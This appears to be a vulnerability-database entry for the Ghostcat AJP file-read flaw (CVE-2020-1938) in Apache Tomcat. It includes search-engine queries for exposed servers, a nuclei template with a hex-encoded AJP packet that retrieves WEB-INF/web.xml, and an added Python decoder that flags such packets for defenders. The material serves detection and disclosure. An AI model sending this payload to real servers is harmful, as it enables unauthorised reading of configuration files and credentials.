Apache Tomcat AJP File Read/Inclusion Vulnerability

Vulnerability information

Vulnerability name: Apache Tomcat AJP File Read/Inclusion Vulnerability

Vulnerability IDs:

  • CVE: CVE-2020-1938

  • CNVD: CNVD-2020-10487

Vulnerability type: file read

Severity: critical

Description: Ghostcat (CVE-2020-1938) is a critical security vulnerability in the Apache Tomcat server, affecting versions 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99. Apache Tomcat is a widely used open-source Java Servlet container for deploying and running Java web applications. The root cause is a default configuration problem in the Apache JServ Protocol (AJP): AJP connections are granted an excessive level of trust, and by default the AJP connector listens on all configured IP addresses. An attacker can exploit this to read or include arbitrary files within the web application and, under certain conditions, achieve remote code execution. Specifically, if an attacker can upload files to the web application or otherwise control its content, they can use this vulnerability to have an uploaded file processed as a JSP, which results in remote code execution. Exploitation requires no authentication and can be automated, so it poses a serious threat to affected systems. Users are advised to upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later, or to disable unneeded AJP connectors to mitigate the vulnerability.

Vendor: Apache

Product: Apache Tomcat

Affected versions: 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99

Search query: title="apache tomcat"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2020%2FCVE-2020-1938.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details

```yaml
id: CVE-2020-1938

info:
  name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
  author: milo2012
  severity: critical
  description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
  remediation: https://access.redhat.com/solutions/4851251
  reference:
    - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
    - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-1938
    cwe-id: CWE-269
    epss-score: 0.94469
    epss-percentile: 0.99995
    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: apache
    product: geode
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
    fofa-query: title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:8009"
    inputs:
      - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"

    read-size: 1024
    matchers:
      - type: word
        words:
          - "See the NOTICE file distributed with"
# digest: 4a0a0047304502205ae5556991b044128ba5f41d0fdf612bc9477bc4334c3be2b8c71b519a613fd2022100e11b38470d922b9810e9bc318e4d6ebe2fa33974b298365f110a02545d7e153b:922c64590222798bb761d5b6d8e72950
```
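The hex string in the template is a single AJP13 FORWARD_REQUEST whose tail carries three `req_attribute` entries (`javax.servlet.include.request_uri`, `javax.servlet.include.path_info`, `javax.servlet.include.servlet_path`); those attributes, not the request URI, decide which file the DefaultServlet serves, which is the whole Ghostcat trick. The decoder below is an added example (not part of the nuclei template or the project) that a defender can run over port-8009 captures to flag such attributes; the function names are mine and the sample packet is constructed, a minimal request with no headers and the same three attributes as the template.

```python
import struct
AJP_MAGIC, FORWARD_REQUEST = b"\x12\x34", 0x02            # AJP13 framing (public spec)
ATTR_REQ_ATTRIBUTE, ATTR_SSL_KEY_SIZE, ATTR_END = 0x0A, 0x0B, 0xFF

def _read_string(buf, pos):
    """AJP string: 2-byte length, bytes, NUL terminator; length 0xFFFF means null."""
    (n,) = struct.unpack_from(">H", buf, pos)
    if n == 0xFFFF:
        return None, pos + 2
    return buf[pos + 2:pos + 2 + n].decode("utf-8", "replace"), pos + 3 + n

def parse_forward_request(packet):
    """Return (req_uri, headers, attributes) of one AJP13 FORWARD_REQUEST packet."""
    (length,) = struct.unpack_from(">H", packet, 2)
    body = packet[4:4 + length]
    if packet[:2] != AJP_MAGIC or not body or body[0] != FORWARD_REQUEST:
        raise ValueError("not a client-to-container FORWARD_REQUEST packet")
    _, pos = _read_string(body, 2)                   # skip prefix + method byte, read protocol
    req_uri, pos = _read_string(body, pos)
    for _ in range(3):                               # remote_addr, remote_host, server_name
        _, pos = _read_string(body, pos)
    (num_headers,) = struct.unpack_from(">H", body, pos + 3)   # after server_port, is_ssl
    pos += 5
    headers, attributes = {}, {}
    for _ in range(num_headers):
        (code,) = struct.unpack_from(">H", body, pos)
        name, pos = (("sc_req_header_%02x" % (code & 0xFF), pos + 2) if code & 0xFF00 == 0xA000
                     else _read_string(body, pos))   # well-known headers: 2-byte code, no name
        headers[name], pos = _read_string(body, pos)
    while pos < len(body) and body[pos] != ATTR_END:
        code, pos = body[pos], pos + 1
        if code == ATTR_SSL_KEY_SIZE:                # the only integer-valued attribute
            attributes["ssl_key_size"], pos = struct.unpack_from(">H", body, pos)[0], pos + 2
            continue
        name = "attr_%02x" % code                    # context, servlet_path, secret, ...
        if code == ATTR_REQ_ATTRIBUTE:               # arbitrary name/value pair
            name, pos = _read_string(body, pos)
        attributes[name], pos = _read_string(body, pos)
    return req_uri, headers, attributes

def ghostcat_indicators(packet):
    """Flag javax.servlet.include.* req_attributes; a legitimate front-end proxy never sends them."""
    return {k: v for k, v in parse_forward_request(packet)[2].items()
            if k.startswith("javax.servlet.include.")}

# Constructed sample: minimal FORWARD_REQUEST (no headers) with the template's three include attributes.
SAMPLE_BODY = bytes.fromhex(
    "0202" "0008485454502f312e3100" "00062f612e6a737000" "00093132372e302e302e3100" "ffff" "00093132372e302e302e3100" "0050" "00" "0000"
    "0a0021" "6a617661782e736572766c65742e696e636c7564652e726571756573745f757269" "00" "00012f00" "0a001f" "6a617661782e736572766c65742e696e636c7564652e706174685f696e666f" "00" "0010" "2f5745422d494e462f7765622e786d6c" "00"
    "0a0022" "6a617661782e736572766c65742e696e636c7564652e736572766c65745f70617468" "00" "00012f00" "ff")
SAMPLE_PACKET = AJP_MAGIC + struct.pack(">H", len(SAMPLE_BODY)) + SAMPLE_BODY
```

A non-empty result from `ghostcat_indicators` on traffic arriving from an untrusted source is the signature this template's matcher relies on from the other direction. The fixed releases harden the connector itself (in 9.0.31 the AJP connector's `address` default became the loopback interface, `secretRequired` defaults to true and request attributes must match `allowedRequestAttributesPattern`), so on older builds the page's advice, disabling or firewalling the connector, is the only protection.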


Author: lianccc
Published: 8 July 2025